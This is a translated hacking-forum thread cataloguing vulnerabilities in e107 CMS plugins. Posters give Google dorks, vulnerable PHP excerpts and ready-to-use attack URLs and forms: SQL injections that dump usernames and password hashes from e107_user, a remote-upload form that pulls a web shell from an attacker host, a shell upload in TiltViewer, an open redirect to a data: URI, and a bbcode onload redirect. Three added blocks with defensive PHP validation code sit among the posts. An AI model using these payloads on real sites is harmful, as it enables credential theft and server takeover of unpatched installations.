[ Overview of e107 CMS vulnerabilities ]

Discussion in 'Web vulnerabilities' started by ettee, 16 Aug 2007.

  1. Strilo4ka

    Don't know whether this has been posted already or not, but here goes:

    downloaded Plugins > E-Commerce > Notice Board from plugins.e107.org [download]
    Author sunout
    Date 13:10 14-May-10

    dork: inurl:e107_plugins/nboard

    e107_plugins/nboard/viewads.php
    PHP:
    require_once("../../class2.php");
    require_once(e_HANDLER."form_handler.php");
    require_once(e_HANDLER."userclass_class.php");
    @include_once(e_PLUGIN."nboard/languages/".e_LANGUAGE.".php");

    $ns = new e107table;
    require_once(HEADERF);
    require_once("classmen.php");
    $uspage = e_BASE;
    $scat = $_GET['scat'];
    $act = $_GET["act"];
    //==================================Debug=======================================
    if ($act == "det"){
        $text .= "<table>";
        $sql -> db_Select("nb_gnl", "*", "gnl_id='$scat' ");
        while($row = $sql -> db_Fetch()){
            $gnl_id = $row['gnl_id'];
            $gnl_name = $row['gnl_name'];
            $gnl_city = $row['gnl_city'];
            $gnl_picbig = $row['gnl_picbig'];
            $gnl_small = $row['gnl_picsmall'];
            $gnl_detail = $row['gnl_detail'];
            $gnl_user = $row['gnl_user'];
            $gnl_phone = $row['gnl_phone'];
            $gnl_email = $row['gnl_email'];
            $gnl_date = $row['gnl_date'];
            $gnl_price = $row['gnl_price'];
            $gnl_kikoz = $row['gnl_kikoz'];

            /*...*/
            //// output happens somewhere around here
        }
        $text .= "</table>";
        $caption = NB_NAME_6;
        $ns -> tablerender($caption, $text);
        require_once(FOOTERF);

    exploit:
    Code:
    http://localhost/e107/e107_plugins/nboard/viewads.php?act=det&scat=1%27%20and%200%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+
    requirement: mg=off


    e107_plugins/nboard/nboard.php
    PHP:
    /*...*/
    $cat = $_GET['cat'];
    $scat = $_GET['scat'];
    $page = $_GET["page"];
    /*...*/
    //====================== all_select ============================//
    function sql_cat($onpage, $page, $cat, $table){
        $begin = $page*$onpage; // where to start from
        $sql = "SELECT * FROM ".$table." WHERE gnl_scatid in (select subcat_id from ".MPREFIX."nb_subcat where subcat_catid=$cat) ORDER BY gnl_id DESC LIMIT ".$begin.", ".$onpage;
        $result_cat = mysql_query($sql) or die(mysql_error());
        return $result_cat;
        echo $result_cat;
    }
    /*...*/
    $onpage = 40; // records per page
    $table = "".MPREFIX."nb_gnl"; // which table to read from
    $page = page(); // determine the current page
    $result = sql_result($onpage, $page, $table, $gnl_pigbig);
    $result_cat = sql_cat($onpage, $page, $cat, $table, $gnl_pigbig);
    $result_scat = sql_scat($onpage, $page, $scat, $table, $gnl_pigbig);
    /*...*/
    Now there should be no preconditions; by the way, there's a subquery in there, so you have to break out with a closing parenthesis.
    There's one more SQL injection in that file, but it needs mg=off.

    Got tired of trying to get output and poking at it => If there is no value in nb_cat, the vulnerability isn't exploitable.
    Anyone who feels like it, take a look.

    in short, via an error:
    Code:
    http://localhost/e107/e107_plugins/nboard/nboard.php?cat=1%29%20and%201=%28select%201%20from%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20%20concat_ws%280x3a,user_loginname,user_password%29%20from%20e107_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29y%29--+
     
  2. Strilo4ka


    pXSS
    nlstart uploaded EasyShop v1.54 26Aug10

    download

    http://[host]/[path]/e107_plugins/easyshop/easyshop_sql.php - the plugin's DB structure

    /e107_plugins/easyshop/easyshop_basket.php
    PHP:
    /*...*/
    // Filling basket from product  = P; return to product overview
    if ($_POST['fill_basket'] == 'C' or $_POST['fill_basket'] == 'P') {
        // refresh_cart(); // IPN addition // might screw up the session variables
        // IPN addition - sets two variables to help keep coding neat later on
        isset($_POST['item_id'])? $action_id=$_POST['item_id']: NULL;
        isset($_SESSION['shopping_cart'][$action_id]['item_track_stock'])
            && ($_SESSION['shopping_cart'][$action_id]['quantity']) < ($_SESSION['shopping_cart'][$action_id]['item_instock'])?
                $allow_add = TRUE:
                $allow_add = NULL;
        isset($_SESSION['shopping_cart'][$action_id]['item_track_stock'])?
                $track_stock = TRUE:
                $track_stock = NULL;

        // Fill the basket with selected product
        if (!array_key_exists($_POST['item_id'], $_SESSION['shopping_cart'])) {
          // Key for item id does not exists; item needs to be added to the array
          $_SESSION['shopping_cart'][$_POST['item_id']] = array('item_name'=>$_POST['item_name'], 'quantity'=>$_POST['item_qty'], 'item_price'=>$_POST['item_price'], 'sku_number'=>$_POST['sku_number'], 'shipping'=>$_POST['shipping'], 'shipping2'=>$_POST['shipping2'], 'handling'=>$_POST['handling'], 'db_id'=> $_POST['db_id']);
          // Handling costs are calculated once per each basket
          $_SESSION['sc_total']['handling'] += (double)$_POST['handling'];
            // IPN addition - check  to see if we're tracking stock, if so put stock amount into SESSION ARRAY
             if ($_POST['item_track_stock'] == 2){
                $_SESSION['shopping_cart'][$_POST['item_id']]['item_instock'] = $_POST['item_instock'];
                $_SESSION['shopping_cart'][$_POST['item_id']]['item_track_stock'] = $_POST['item_track_stock'];
             }
        }
        else if (!isset($track_stock) || isset($allow_add)){
          // IPN addition check quantity against item_instock
          // Key for item id does exist; only quantity needs to raised
          $_SESSION['shopping_cart'][$_POST['item_id']]['quantity'] += $_POST['item_qty'];
        }

        if (!isset($track_stock) || isset($allow_add)){  // IPN addition - don't increment if quantity is at max stock level
            // Fill the sc_total array
            $previous_nr_of_items = $_SESSION['shopping_cart']['item_id']['quantity']; // Fix bug #88
            $_SESSION['sc_total']['items'] += $_POST['item_qty'];
            $_SESSION['sc_total']['sum'] += (double)$_POST['item_price'] * $_POST['item_qty'];
            // Extra shippings costs are conditioned (only calculate for first product)
            if ((integer)($_SESSION['shopping_cart'][$_POST['item_id']]['quantity']) >= 1 and $previous_nr_of_items == 0) { // Fix bug #81
              $_SESSION['sc_total']['shipping'] += (double)$_POST['shipping'];
            }
            // PayPal charges shipping2 costs for all items above quantity of 2
            if ((integer)($_SESSION['shopping_cart'][$_POST['item_id']]['quantity']) > 1) {
                if ($previous_nr_of_items == 0) {
                    $_SESSION['sc_total']['shipping2'] += (double)$_POST['shipping2'] * ($_POST['item_qty']-1);
                }
                else {
                    $_SESSION['sc_total']['shipping2'] += (double)$_POST['shipping2'] * $_POST['item_qty'];
                }
            }
        }

        // Close the session (before a location redirect: otherwise the variables may not display correctly)
        session_write_close();
        // Return to original url
        header("Location: ".$_POST['return_url']);
        exit();
    }
    HTML:
    <form name="" action="http://e107/e107_plugins/easyshop/easyshop_basket.php" method="post">
    <input name="fill_basket" type="hidden" value="C">
    <input name="return_url" type="hidden" value="data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ+">
    <input type="submit" value="Send">
    </form>
    PS: 5 minutes of searching!
     
    #62 Strilo4ka, 31 Aug 2010
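The `header("Location: ".$_POST['return_url'])` line above is where the PoC's `data:` URL lands. As an added example that is not EasyShop's own code (the function name `safe_return_url` is mine), this is the check that keeps the redirect target on the shop's own site and falls back to a default for everything else, tried against the PoC value and a few related shapes:

```php
<?php
// Added example (not part of the EasyShop plugin): validate a user-supplied
// redirect target before it goes into a Location header.
// Policy: only a site-local absolute path ("/e107/...") is accepted; any
// scheme (data:, javascript:, http:), a protocol-relative "//host", or a
// CR/LF in the value is refused and the caller's default is used instead.

function safe_return_url($candidate, $default)
{
    if (!is_string($candidate) || $candidate === '') {
        return $default;
    }
    // Header injection: a CR or LF would let the value append extra headers.
    if (preg_match('/[\r\n]/', $candidate)) {
        return $default;
    }
    $parts = parse_url($candidate);
    if ($parts === false) {
        return $default;
    }
    // Any scheme, host or userinfo means the target is not a local path.
    // parse_url("data:text/html;base64,...") yields scheme "data";
    // parse_url("//evil.example/") yields host "evil.example".
    if (isset($parts['scheme']) || isset($parts['host']) || isset($parts['user'])) {
        return $default;
    }
    $path = isset($parts['path']) ? $parts['path'] : '';
    // Must be an absolute local path; "\" is rejected because some browsers
    // treat "/\host" like "//host".
    if ($path === '' || $path[0] !== '/' || strpos($path, '\\') !== false) {
        return $default;
    }
    // Re-assemble only the components we understand: path, query, fragment.
    $url = $path;
    if (isset($parts['query']))    { $url .= '?' . $parts['query']; }
    if (isset($parts['fragment'])) { $url .= '#' . $parts['fragment']; }
    return $url;
}

// --- self-check on constructed inputs, including the PoC's data: URI -----
$default = '/e107/e107_plugins/easyshop/easyshop.php';
$cases = array(
    'data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ+' => $default,
    'javascript:alert(1)'                                        => $default,
    'http://attacker.example/'                                   => $default,
    '//attacker.example/'                                        => $default,
    "/e107/index.php\r\nSet-Cookie: x=1"                         => $default,
    '/e107/e107_plugins/easyshop/easyshop.php?cat=2#top'
        => '/e107/e107_plugins/easyshop/easyshop.php?cat=2#top',
);
foreach ($cases as $input => $expected) {
    $got = safe_return_url($input, $default);
    if ($got !== $expected) {
        throw new Exception("unexpected result for $input: $got");
    }
}
echo "all redirect checks passed\n";
```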
  3. Strilo4ka

    FileDownload Advanced v2.0 by The Hunter
    download
    google: inurl:e107_plugins/FileDownload

    http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php
    PHP:
    require_once("config.php");
    require_once("functions.php");

    if ($_GET["dir"])
        $dir = $_GET["dir"];
    else
        $dir = $_POST["dir"];

    if ($_POST["numfiles"])
        $numfiles = $_POST["numfiles"];
    else
        $numfiles = 4;

    if ((isset($_POST["hide"])) and (isset($dir)))
    {
        for ($x = 1; $_POST["file".$x]; $x++)
        {
            $file = $_POST["file".$x];
            $copy = copy($file, $dir."/".getFileName($file));
            $upload_ok .= "<tr><td style='width:100%' colspan=8 class='header2'>Uploaded:" . getFileName($file) . " successfully.</td></tr>";
        }
    }
    ./config.php
    PHP:
    //$expPrefPass='';
    $expBaseDir='../';
    $expSortOrder=0;
    $expDisplaySearch...
    As you can see, the first line is commented out.
    ...
    ./functions
    PHP:
    require_once("config.php");

    if (isset($_COOKIE["phpFileDownload_login"]))
        if ($_COOKIE["phpFileDownload_login"] != $expPrefPass)
            header ("location: login.php");...
    And so there is no redirect at all if you simply don't set the cookie. ):
    ...function getFileName ($file)
    {
        $strlen = strlen($file);
        $retfile = "";
        while ($strlen > 0)
        {
            $_g = substr(substr($file, $strlen, strlen($file)), 0, 1);
            if (($_g == "\\") or ($_g == "/"))
                break;

            $retfile = substr($file, $strlen, strlen($file));
            $strlen = $strlen-1;
        }
        return $retfile;
    }...
    Result:
    Upload the shell to a host, or serve it from your own shared one.

    Send the request:
    <form action="http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php" method=post>
    <input type=hidden name=hide value=0><br>
    <input type=text name="file1" value='http://[host2]/[path]/shell.php'><br>
    <input type=text name=dir value=log><br>
    <input type=submit>
    </form>

    Our shell:
    http://[host]/[path]/FileDownload/filedownload/log/shell.php

    PS: other upload methods

    TiltViewer v1.2 by The_Death_Raw
    If it's installed, you're in luck. download

    Upload the shell!
    google: inurl:e107_plugins/tiltviewer
    http://[host]/[path]/e107_plugins/tiltviewer/gestion_fichiers.php
    PHP:
    ...// upload function
    foreach ($_FILES["filez"]["error"] as $key => $error) {
        if ($error == UPLOAD_ERR_OK) {
            $tmp_name = $_FILES["filez"]["tmp_name"][$key];
            $name = $_FILES["filez"]["name"][$key];
            move_uploaded_file($tmp_name, "./uploads/$name");

            Header("Location: ".$_SERVER['PHP_SELF']."");

        }...
    Choose our shell and Send the files
    http://[host]/[path]/e107_plugins/tiltviewer/uploads/name_our_shell.php

    PS: I was logged in as admin when I uploaded; privileges are needed, but it might come in handy ;)

    other upload methods

    AACGC Hall of Shame v1.6 by ~M@CH!N3~
    07:27 02-Apr-10
    download
    Blind SQL inj
    google: inurl:e107_plugins/aacgc_hos
    [path]/e107_plugins/aacgc_hos/HOS_Details.php
    PHP:
    ...require_once("../../class2.php");
    require_once(HEADERF);
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }


    //------------------------------------------------------------------------------------------------------------

    $text .= "<center><table style='width:90%' class='indent' cellspacing='' cellpadding=''>";


    $sql->db_Select("aacgc_hos", "*", "WHERE hos_id = $sub_action","");
    $row = $sql->db_Fetch();...
    plus: no preconditions.
    minus: you need to know hos_id.

    Result:
    Suppose hos_id=1 and the MySQL 5 branch
    http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=5 - there is content!
    http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=4 - no content!

    PS: with "+" the content wasn't displayed (when putting it in GET)
     
    #63 Strilo4ka, 3 Sep 2010
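Both upload handlers above trust client input for the file source, the file name and, in FileDownload, the target directory (`copy($file, $dir."/".getFileName($file))` and `move_uploaded_file($tmp_name, "./uploads/$name")`). The following is an added example, not code from either plugin: the function names are mine, the extension list is an assumption, and it creates a constructed upload root under the system temp dir so it runs stand-alone:

```php
<?php
// Added example (not the FileDownload or TiltViewer plugin code): the checks
// the two upload handlers above lack. Everything here is constructed; the
// allowed-extension list is an assumption for a gallery/download plugin.

// Reduce a client-supplied name to a safe basename with an allowed extension.
// Returns null when the name cannot be accepted.
function safe_file_name($original, $allowed_ext = array('jpg', 'jpeg', 'png', 'gif', 'zip', 'pdf'))
{
    // Keep only the last path component (the page's getFileName() did this by
    // hand) and strip NUL bytes, which truncate names in older PHP builds.
    $base = basename(str_replace("\0", '', (string)$original));
    // One name part, one dot, one extension: refuses "shell.php.jpg",
    // ".htaccess", names with spaces or shell metacharacters.
    if (!preg_match('/^([A-Za-z0-9_-]+)\.([A-Za-z0-9]+)$/', $base, $m)) {
        return null;
    }
    $ext = strtolower($m[2]);
    if (!in_array($ext, $allowed_ext, true)) {
        return null;
    }
    return $m[1] . '.' . $ext;
}

// Resolve a client-supplied sub-directory against the upload root and make
// sure the result is still inside the root (blocks "../" and absolute paths).
function resolve_target_dir($root, $sub)
{
    $root = realpath($root);
    if ($root === false) {
        return null;
    }
    $target = realpath($root . '/' . $sub);
    if ($target === false) {
        return null;               // does not exist; never auto-create from user input
    }
    // $target must be $root itself or lie strictly below "$root/".
    if ($target !== $root && strpos($target, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $target;
}

// Glue for a real handler: only a file PHP itself received via multipart
// upload is moved; copy() from a URL or arbitrary local path is never used.
function store_upload($tmp_name, $original_name, $root, $sub)
{
    if (!is_uploaded_file($tmp_name)) {
        return null;
    }
    $name = safe_file_name($original_name);
    $dir  = resolve_target_dir($root, $sub);
    if ($name === null || $dir === null) {
        return null;
    }
    $dest = $dir . DIRECTORY_SEPARATOR . $name;
    return move_uploaded_file($tmp_name, $dest) ? $dest : null;
}

// --- self-check on constructed input -------------------------------------
$root = sys_get_temp_dir() . '/upload_example_' . getmypid();
mkdir($root);
mkdir($root . '/log');

$nameCases = array(
    'shell.php'                   => null,
    'shell.php.jpg'               => null,
    '../shell.php'                => null,
    'http://host2/path/shell.php' => null,   // the FileDownload PoC's remote source
    '.htaccess'                   => null,
    'Photo_01.JPG'                => 'Photo_01.jpg',
);
foreach ($nameCases as $in => $want) {
    if (safe_file_name($in) !== $want) { throw new Exception("name check failed for $in"); }
}
if (resolve_target_dir($root, 'log') !== realpath($root . '/log')) { throw new Exception('log dir'); }
if (resolve_target_dir($root, '../') !== null)                       { throw new Exception('traversal'); }
if (resolve_target_dir($root, '/etc') !== null)                      { throw new Exception('absolute'); }

rmdir($root . '/log');
rmdir($root);
echo "all upload checks passed\n";
```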
  4. kori256

    Tested only on 0.7.22 and 0.7.23. Not exactly a vulnerability, but you can wreck any comment, whether on the forum, in a PM, or a comment on a user or a news item.

    it's enough to insert

    Code:
    [img onload=document.location.href=0x687474703a2f2f676f6f676c652e7275]http://host/e107_images/generic/bbcode/image.png[/img]
    0x687474703a2f2f676f6f676c652e7275 is google in hex; you can insert anything

    ©by sw3n
     
    #64 kori256, 3 Sep 2010
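What makes the `[img onload=...]` trick above work is a bbcode renderer that copies whatever follows `[img` into the generated tag. As an added example that is not e107's bbcode parser (function names are mine), this renderer recognises only the literal `[img]URL[/img]` form, validates and escapes the URL, and is checked against the payload from the post:

```php
<?php
// Added example (not e107's own bbcode parser): render [img]...[/img] so that
// nothing typed between "[img" and "]" can reach the HTML, and the URL is
// validated and escaped before it is placed in src="".

// Accept only absolute http(s) URLs made of printable ASCII without quotes,
// spaces, angle brackets or control characters, so the value cannot close
// the attribute or the tag even before escaping.
function is_safe_image_url($url)
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return false;
    }
    // Printable ASCII 0x21-0x7e minus " (0x22), ' (0x27), < (0x3c), > (0x3e).
    return preg_match('/^[\x21\x23-\x26\x28-\x3b\x3d\x3f-\x7e]+$/', $url) === 1;
}

// Converts comment text to HTML. The only tag form recognised is the literal
// "[img]URL[/img]"; "[img onload=...]" is not a tag and is shown as text.
function render_comment($text)
{
    // With the whole pattern captured, odd indices hold the matched tags.
    $pieces = preg_split('/(\[img\].*?\[\/img\])/is', $text, -1, PREG_SPLIT_DELIM_CAPTURE);
    $out = '';
    foreach ($pieces as $i => $piece) {
        if ($i % 2 === 1) {
            $url = trim(substr($piece, 5, -6));   // strip "[img]" and "[/img]"
            if (is_safe_image_url($url)) {
                $out .= '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
                continue;
            }
        }
        $out .= htmlspecialchars($piece, ENT_QUOTES, 'UTF-8');   // plain text or rejected tag
    }
    return $out;
}

// --- self-check on constructed comments -----------------------------------
$good = '[img]http://host/e107_images/generic/bbcode/image.png[/img]';
if (render_comment($good) !== '<img src="http://host/e107_images/generic/bbcode/image.png" alt="">') {
    throw new Exception('valid image tag not rendered');
}
// The payload from the post above: attribute text inside the opening tag.
$attr = '[img onload=document.location.href=0x687474703a2f2f676f6f676c652e7275]'
      . 'http://host/e107_images/generic/bbcode/image.png[/img]';
if (strpos(render_comment($attr), '<') !== false) {
    throw new Exception('attribute smuggled into HTML');
}
// A quote inside the URL, and a non-http scheme, are both refused.
$bad = array('[img]http://host/a.png" onload="x[/img]', '[img]javascript:alert(1)[/img]');
foreach ($bad as $b) {
    if (strpos(render_comment($b), '<img') !== false) {
        throw new Exception('unsafe URL rendered');
    }
}
echo "all bbcode checks passed\n";
```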
  5. Strilo4ka

    AACGC Friend System v.1.1 - e107 plugin
    download from plugins.e107.org
    inurl:/e107_plugins/aacgc_friendsys/

    Path disclosure
    display_errors = on

    PoC
    Code:
    http://[host]/[path]//e107_plugins/aacgc_friendsys/admin_menu.php
    http://[host]/[path]/e107_plugins/aacgc_friendsys/User_Friend_List_menu.php
    SQL inj
    magic_quotes_gpc = Off, you need to be logged in.

    /e107_plugins/aacgc_friendsys/Friend_Requests.php
    PHP:
    /*...*/
    if (USER){

    if ($pref['fl_enable_gold'] == "1")
    {
    $gold_obj = new gold();}
    /*...*/
    if (isset($_POST['accept_user'])){

    $newuser = $_POST['user_id'];
    $newfriend = $_POST['user_friends'];
    /*...*/
    $sql->db_Insert("aacgc_friend_sys", "NULL, '".$newuser."', '".$newfriend."'") or die(mysql_error());
    /*...*/
    /e107_handlers/mysql_class.php
    PHP:
    /*...*/
    function db_Insert($table, $arg, $debug = FALSE, $log_type = '', $log_remark = '') {
            $table = $this->db_IsLang($table);
            $this->mySQLcurTable = $table;
            if(is_array($arg))
            {
                $keyList = "`".implode("`,`", array_keys($arg))."`";
                $valList = "'".implode("','", $arg)."'";
                $query = "INSERT INTO `".MPREFIX."{$table}` ({$keyList}) VALUES ({$valList})";
            }
            else
            {
                $query = 'INSERT INTO '.MPREFIX."{$table} VALUES ({$arg})";
            }

            if(!$this->mySQLaccess)
            {
                global $db_ConnectionID;
                $this->mySQLaccess = $db_ConnectionID;
            }


            if ($result = $this->mySQLresult = $this->db_Query($query, NULL, 'db_Insert', $debug, $log_type, $log_remark )) {
                $tmp = mysql_insert_id($this->mySQLaccess);
                return ($tmp) ? $tmp : TRUE; // return true even if table doesn't have auto-increment.
            } else {
                $this->dbError("db_Insert ($query)");
                return FALSE;
            }
        }
    /*...*/
    PoC
    Code:
    <form action=http://[host]/[path]/e107_plugins/aacgc_friendsys/Friend_Requests.php method=post>
    <input name=user_id type=text value="1',(select count(*) from (select 1 union select 2 union select 3)x group by concat((select concat_ws(':',user_loginname, user_password) from e107_user limit 0,1 ),floor(rand(0)*2))))#">
    <input type=submit name=accept_user value=Send>
    </form>
    SQL inj
    you need to be logged in.

    /e107_plugins/aacgc_friendsys/AddMe.php
    Code:
    require_once("../../class2.php");
    require_once(HEADERF);
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }
    
    if (USER){
    
    $sql->db_Select("aacgc_friend_sys", "*", "WHERE user_id = ".USERID."","");
    $row = $sql->db_Fetch();
    
    
    $sql2 = new db;
    $sql2->db_Select("user", "*", "WHERE user_id = $sub_action ","");
    $row2 = $sql2->db_Fetch();
    print_r($row2);
    
    //----------------------------------------------
    /*...*/
    $text .= "<center>
    <form method='POST' action='AddMe.php?det.".$row2['user_id']."'>
    <table style='' class='indent'><tr>
    <td>
    <input type='hidden' name='user_friends_request' value='".USERID."'>
    <input type='hidden' name='user_id' value='".$row2['user_id']."'>
    </td>
    </tr>
    <tr>
    <td>
    <i>Are You Sure You Want To Add</i> <b>".$row2['user_name']."</b> <i>To Your Friends List?</i>
    ";
    /*...*/
    
    PoC:
    Code:
    http://[host]/[path]/e107_plugins/aacgc_friendsys/AddMe.php?0.1%20and%200%20union%20select%201,concat_ws%280x3a,user_loginname,user_password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20e107_user%20limit%200,1
     
    #65 Strilo4ka, 21 Oct 2010
  6. Фараон

    AACGC Wish List
    http://plugins.e107.org/

    SQL Injection:
    /News_Details.php
    PHP:
    ...
    $sql ->db_Select("aacgc_pnews", "*", "WHERE news_id = ".$sub_action."","");
    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_pnews/News_Details.php?det.-42%20union%20select%201,concat_ws(0x3a,user_loginname,user_password),3,4,5,6,7,8%20from%20e107_user%20limit%200,1

    /News.php
    PHP:
    ...
    $sql ->db_Select("aacgc_pnews_cat", "*", "WHERE news_cat_id = ".$sub_action."","");
    $row = $sql ->db_Fetch();
    $newscatid = $row['news_cat_id'];
    ...
    $sql2->mySQLresult = @mysql_query("select * from ".MPREFIX."aacgc_pnews where news_cat=".$newscatid." ORDER BY news_date DESC;");
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_pnews/News.php?det.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user
    
    Path:
    http://e107/e107_plugins/aacgc_pnews/e_latest.php
    http://e107/e107_plugins/aacgc_pnews/e_status.php
    http://e107/e107_plugins/aacgc_pnews/pnews_singlecat_menu.php

    Dork: inurl:e107_plugins/aacgc_pnews/
    If this is old news, sorry.
     
    #66 Фараон, 10 Dec 2010
  7. Фараон

    AACGC Arcade Addons V3.3

    SQL Injection:
    /Category.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);}
    ...
    $sql->mySQLresult = @mysql_query("SELECT * FROM ".MPREFIX."arcade_categories WHERE cat_id = $sub_action");
    ...
    Example:
    Code:
    http://e107games.net/e107_plugins/aacgc_arcade_addins/Category.php?det.-1%20union%20select%201,2,3,4,5,6--
    
    Path:
    http://e107/e107_plugins/aacgc_arcade_addins/Alternate_Arcade_Main_menu.php
    http://e107/e107_plugins/aacgc_arcade_addins/Arcade_Champ_menu.php
    http://e107/e107_plugins/aacgc_arcade_addins/Arcade_Favorites_menu.php
    http://e107/e107_plugins/aacgc_arcade_addins/Challenge_Champ_menu.php
    etc...

    Dork: inurl:e107_plugins/aacgc_arcade_addins/
    If this is old news, sorry.
     
  8. Фараон

    AACGC CMMS v1.2

    Administrator privileges required, SQL Injection:
    /admin_edit_cat.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $id = $tmp[1];
            unset($tmp);
    }
    ...
                    $sql->db_Select("aacgc_bt_cat", "*", "cat_id = $id");
    ...
    $sql->mySQLresult = @mysql_query("SELECT * FROM ".MPREFIX."arcade_categories WHERE cat_id = $sub_action");
    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_btracker/admin_edit_cat.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user--
    
    SQL Injection:
    /Bracket_Details.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }
    ...
                    $sql->db_Select("aacgc_bt_cat", "*", "WHERE cat_id=$sub_action","");
    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_btracker/Bracket_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user--
    
    Path:
    http://e107/e107_plugins/aacgc_btracker/admin_menu.php

    Dork: inurl:e107_plugins/aacgc_btracker/
     
    #68 Фараон, 10 Dec 2010
  9. Фараон

    AACGC Tracker V1.2

    Administrator privileges required, SQL Injection:
    /admin_edit_cat.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $id = $tmp[1];
            unset($tmp);
    }
    ...
                    $sql->db_Select("aacgc_tracker_cat", "track_cat_id, track_cat_name", "track_cat_id = $id");

    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_tracker/admin_edit_cat.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user--
    
    SQL Injection:
    /Tracker.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }
    ...
    $sql->db_Select("aacgc_tracker", "*", "WHERE track_cat=$sub_action","");
    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_tracker/Tracker.php?det.-1%20union%20select%201,2,3,concat_ws(0x3a,user_name,user_password),5,6%20from%20e107_user--
    
    SQL Injection:
    /Tracker_Details.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }
    ...
    $sql3->db_Select("aacgc_tracker", "*", "WHERE track_id=$sub_action", "");
    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_tracker/Tracker_Details.php?det.-1%20union%20select%201,2,3,concat_ws(0x3a,user_name,user_password),5,6%20from%20e107_user--
    

    Path:
    http://e107/e107_plugins/aacgc_tracker/admin_menu.php

    Dork: inurl:e107_plugins/aacgc_tracker/
     
  10. Фараон

    AACGC MIA List V1.3

    Administrator privileges required, SQL Injection:
    /admin_edit.php
    PHP:
    ...
    if ($action == "edit")
    {
            $sql->db_Select("aacgc_mialist", "*", "WHERE mia_id=$id","");
            $row = $sql->db_Fetch();
            $sql2 = new db;
            $sql2->db_Select("user", "*", "WHERE user_id=".$row['mia_user']."","");
            $row2 = $sql2->db_Fetch();
            $sql3 = new db;
            $sql3->db_Select("user", "*");
            $rows = $sql3->db_Rows();
            for ($i=0; $i < $rows; $i++) {
            $option = $sql3->db_Fetch();
            $options .= "<option name='mia_user' value='".$option['user_id']."'>".$option['user_name']."</option>";}
    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_mialist/admin_edit.php?edit.-1%20union%20select%20concat_ws(0x3a,user_name,user_password),2222,3333%20from%20e107_user%20limit%200,1--
    
    Output is at the bottom of the page source
    Path:
    http://e107/e107_plugins/aacgc_mialist/MIA_List_menu.php
    http://e107/e107_plugins/aacgc_mialist/admin_menu.php

    Dork: inurl:e107_plugins/aacgc_mialist/
     
  11. Фараон

    AACGC Trophy Room V1.5

    Administrator privileges required, SQL Injection:
    /admin_edit_event.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $id = $tmp[1];
            unset($tmp);
    }
    ...
    if ($action == "edit")
    {
                    $sql->db_Select("aacgc_trophy_room", "*", "event_id = $id");
                    $row = $sql->db_Fetch();
    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_trophy_room/admin_edit_event.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5%20from%20e107_user--
    
    SQL Injection:
    /Event_Details.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }
    }
    ...
    $sql->db_Select("aacgc_trophy_room", "*", "WHERE event_id = $sub_action","");
    $row = $sql->db_Fetch();
    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_trophy_room/Event_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5%20from%20e107_user--
    
    Path:
    http://e107/e107_plugins/aacgc_trophy_room/admin_menu.php

    Dork: inurl:e107_plugins/aacgc_trophy_room/
     
    #71 Фараон, 11 Dec 2010
  12. Фараон

    AACGC Clan Listing V2.0

    Administrator privileges required, SQL Injection:
    /admin_edit.php
    PHP:
    ...
